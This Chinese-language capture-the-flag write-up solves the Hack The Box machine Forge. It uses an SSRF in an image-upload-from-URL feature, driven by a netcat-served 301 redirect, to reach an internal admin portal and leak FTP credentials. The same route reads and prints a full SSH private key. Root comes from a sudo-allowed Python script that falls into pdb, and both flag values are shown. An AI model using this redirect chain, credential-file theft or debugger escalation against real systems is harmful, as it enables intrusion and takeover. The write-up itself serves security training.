Forge-htb-writeup

0x00 靶场技能介绍

章节技能：WEB功能分析、VHOSTS枚举、SSRF、301跳转数据包构造、curl工具POST包构造、Python代码构造

参考链接：https://0xdf.gitlab.io/2022/01/22/htb-forge.html

参考链接：https://khaoticdev.net/hack-the-box-forge/

0x01 用户权限获取

1、获取靶机IP地址：10.10.11.111

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.11.111 tcp               
[sudo] kali 的密码：
开始对 10.10.11.111 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.11.111" -oG "10.10.11.111"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-24 16:45 CST
Nmap scan report for 10.10.11.111
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http

Nmap done: 1 IP address (1 host up) scanned in 11.48 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -O -p"22,80," "10.10.11.111"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-24 16:45 CST
Nmap scan report for 10.10.11.111
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (93%), Linux 4.15 - 5.8 (93%), Linux 5.3 - 5.4 (92%), Linux 2.6.32 (92%), Linux 5.0 - 5.5 (92%), Linux 3.1 (91%), Linux 3.2 (91%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (90%), Linux 5.0 - 5.4 (89%), Linux 5.4 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.09 seconds

3、根据扫描信息，绑定下本地hosts地址

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ echo "10.10.11.111 forge.htb" | sudo tee -a /etc/hosts
10.10.11.111 forge.htb

4、分别使用 dirsearch 和 ffuf 扫描下目录信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://forge.htb/   

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_forge.htb/__24-01-24_17-38-25.txt

Target: http://forge.htb/

[17:38:25] Starting: 
[17:40:45] 403 -  274B  - /server-status                                    
[17:40:46] 403 -  274B  - /server-status/
[17:40:53] 301 -  307B  - /static  ->  http://forge.htb/static/             
[17:40:53] 404 -  271B  - /static/api/swagger.yaml                          
[17:40:53] 404 -  271B  - /static/api/swagger.json
[17:40:53] 404 -  271B  - /static/dump.sql
[17:41:02] 200 -  929B  - /upload                                           
[17:41:02] 301 -  224B  - /uploads  ->  http://forge.htb/uploads/  


┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://forge.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://forge.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

uploads                 [Status: 301, Size: 224, Words: 21, Lines: 4, Duration: 324ms]
static                  [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 333ms]
upload                  [Status: 200, Size: 929, Words: 267, Lines: 33, Duration: 315ms]

:: Progress: [81643/81643] :: Job [1/1] :: 31 req/sec :: Duration: [0:12:38] :: Errors: 0 ::

5、其实这里也对子域名扫描下，没有发现什么有用的信息的，由于是虚拟靶机地址所以DNS式的爆破是不行，这里需要使用vhost形式枚举才可以，看看是否存在存在其他子域情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ wfuzz -u http://10.10.11.111 -H "Host: FUZZ.forge.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 26
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.111/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload                 
=====================================================================

000000024:   200        1 L      4 W        27 Ch       "admin"

6、这里是发现了一个子域名的信息的，本地绑定下，并查看下页面情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.111 admin.forge.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.111 admin.forge.htb

7、那继续，看一下网站的80端口开放情况

http://forge.htb/

8、80端口的是一个网站，都是图片展示的情况，那继续看下upload目录，这个页面是个文件上传的页面，会把读取到的文件，生成一个链接，而链接对应的内容，就是读取到的文件的内容

http://forge.htb/upload

9、通过测试，发现这个页面，存在两种文件上传的方式，一个是本地文件上传，一个是远程文件上传，输入一个错误的网络地址，页面出现了报错信息

An error occured! Error : HTTPConnectionPool(host='10.10.14.6', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2ff7c4cf40>: Failed to establish a new connection: [Errno 111] Connection refused'))

10、通过挂起一个nc的443端口监听，查看监听到的内容。

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 39270
GET / HTTP/1.1
Host: 10.10.14.6:443
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

11、这里可以知道是使用的python的服务进行请求的，且这里是存在SSRF漏洞的，可以任意访问其他地址，通过前面的 admin.forge.htb 域名显示的情况，我们可以本地起一个HTTP服务，然后当靶机访问我们的服务时，然后跳转去读取那个admin子域的信息，然后我们通过查看网站的信息，去看看那个子域名到底是什么信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'HTTP/1.1 301 Moved Permanently' > response-301 

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Date: Fri, 26 Jan 2024 06:56:12 GMT' >> response-301   

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Server: Apache/2.4.41 (Ubuntu)' >> response-301   

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Location: http://admin.forge.htb/' >> response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301                                        
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52036
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

12、然后我们使用curl让靶机远程访问下我们的服务端口

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
    <title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/upload.css">
    <script type="text/javascript" src="/static/js/main.js"></script>
    <header>
            <nav>
                <h1 class=""><a href="/">Gallery</a></h1>
                <h1 class="align-right"><a href="/upload">Upload an image</a></h1>
            </nav>
    </header>
    <center>
        <br><br>
        <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">
                
            </div>
        </div>
    </center>
    <br>
    <br>
    <h1>
        <center>
            <strong>File uploaded successfully to the following url:</strong>
        </center>
    </h1>
    <h1>        
        <center>
            <strong><a href="http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr">http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr</strong>
        </center>
    </h1>
</body>
</html>

13、我们请求下这个地址，看看显示的内容是什么

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr                            
<!DOCTYPE html>
<html>
<head>
    <title>Admin Portal</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br><br>
    <br><br><br><br>
    <center><h1>Welcome Admins!</h1></center>
</body>
</html> 

14、通过查看这个返回信息，我们知道了 admin.forge.htb 是有个 /announcements 目录的，我们修改下跳转内容，再继续访问下看看

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301 

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301 
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/announcements

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52074
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

15、继续请求下查看下内容

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
    <title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/upload.css">
    <script type="text/javascript" src="/static/js/main.js"></script>
    <header>
            <nav>
                <h1 class=""><a href="/">Gallery</a></h1>
                <h1 class="align-right"><a href="/upload">Upload an image</a></h1>
            </nav>
    </header>
    <center>
        <br><br>
        <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">
                
            </div>
        </div>
    </center>
    <br>
    <br>
    <h1>
        <center>
            <strong>File uploaded successfully to the following url:</strong>
        </center>
    </h1>
    <h1>        
        <center>
            <strong><a href="http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o">http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o</strong>
        </center>
    </h1>
</body>
</html> 

16、请求下生成的这个地址

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o                            
<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>
</body>
</html>

17、这里其实我们发现了个ftp的账号密码信息

user:heightofsecurity123!

18、那这里就根据提示，设置下访问ftp地址，看看里面有什么内容

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301 
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52150
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

19、开始发送请求

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
    <title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/upload.css">
    <script type="text/javascript" src="/static/js/main.js"></script>
    <header>
            <nav>
                <h1 class=""><a href="/">Gallery</a></h1>
                <h1 class="align-right"><a href="/upload">Upload an image</a></h1>
            </nav>
    </header>
    <center>
        <br><br>
        <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">
                
            </div>
        </div>
    </center>
    <br>
    <br>
    <h1>
        <center>
            <strong>File uploaded successfully to the following url:</strong>
        </center>
    </h1>
    <h1>        
        <center>
            <strong><a href="http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN">http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN</strong>
        </center>
    </h1>
</body>
</html>

20、查看下请求

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN                            
drwxr-xr-x    3 1000     1000         4096 Aug 04  2021 snap
-rw-r-----    1 0        1000           33 Jan 26 06:47 user.txt

21、根据这里的情况，我们初步判断这里可能是某个用户的根目录，那是否可以直接读取到.ssh的秘钥信息？

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52232
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload   
<!DOCTYPE html>
<html>
<head>
    <title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/upload.css">
    <script type="text/javascript" src="/static/js/main.js"></script>
    <header>
            <nav>
                <h1 class=""><a href="/">Gallery</a></h1>
                <h1 class="align-right"><a href="/upload">Upload an image</a></h1>
            </nav>
    </header>
    <center>
        <br><br>
        <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">
                
            </div>
        </div>
    </center>
    <br>
    <br>
    <h1>
        <center>
            <strong>File uploaded successfully to the following url:</strong>
        </center>
    </h1>
    <h1>        
        <center>
            <strong><a href="http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD">http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD</strong>
        </center>
    </h1>
</body>
</html> 

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD                            
-----BEGIN OPENSSH PRIVATE KEY-----
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
shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

22、可以看到是成功的获取到了秘钥信息，我们下载下这个文件，并生成本地的秘钥

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD -o id_rsa                  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2590  100  2590    0     0   2044      0  0:00:01  0:00:01 --:--:--  2047

23、给文件增加下权限

┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa 

24、我们开始ssh登录下靶机

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -i id_rsa user@10.10.11.111
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 26 Jan 2024 07:21:15 AM UTC

  System load:           0.0
  Usage of /:            43.8% of 6.82GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             222
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.111
  IPv6 address for eth0: dead:beef::250:56ff:feb9:2bd1


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Aug 20 01:32:18 2021 from 10.10.14.6
user@forge:~$ 

25、那就读取下第一个flag信息吧

user@forge:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@forge:~$ ls
snap  user.txt
user@forge:~$ cat user.txt 
758819b7fe569e0c14f21ee150651668
user@forge:~$ 

注：以上的利用过程总结下

我提交 http://10.10.14.6/3?f=.ssh/ 作为 /upload on forge.htb 的 URL。

筛选器检查并批准 URL。

forge.htb 来自 Flask 的请求 /3?.f=.ssh/ 。

Flask 返回 302 重定向到 http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/ 。这将发送到 forge.htb /upload on admin.forge.htb ，它可以处理 FTP，带有 get 参数连接到本地 FTP 服务器，

admin.forge.htb 从 FTP 请求 /.ssh/ 目录列表。

FTP 返回结果，通过 admin.forge.htb 结果将它们返回到 forge.htb 。

forge.htb 使用随机名称将结果保存在 /uploads 目录中。

该已保存文件的 URL 将返回给我。

0x02 系统权限获取

26、查看下sudo权限情况

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
user@forge:~$ 

27、这里发现了是一个运行py文件的命令，那查看下这个py文件吧

user@forge:~$ 
user@forge:~$ ls -la /opt/remote-manage.py
-rwxr-xr-x 1 root root 1447 May 31  2021 /opt/remote-manage.py
user@forge:~$ cat /opt/remote-manage.py
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()
user@forge:~$ 

28、这里发现是第一个端口监听的，如果输入正确的密码，就会进入服务，如果报错的话，就会进入到Python的shell的环境中，接下来就能获取到最终的flag信息了

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:55021
invalid literal for int() with base 10: b'shiyan'
> /opt/remote-manage.py(27)<module>()
-> option = int(clientsock.recv(1024).strip())
(Pdb) import os
(Pdb) os.system('bash')
root@forge:/home/user# 
root@forge:/home/user# cd /root/
root@forge:~# ls
clean-uploads.sh  root.txt  snap
root@forge:~# cat root.txt
afe109870ab64a4c1fd94f6a45f5f2b5
root@forge:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/376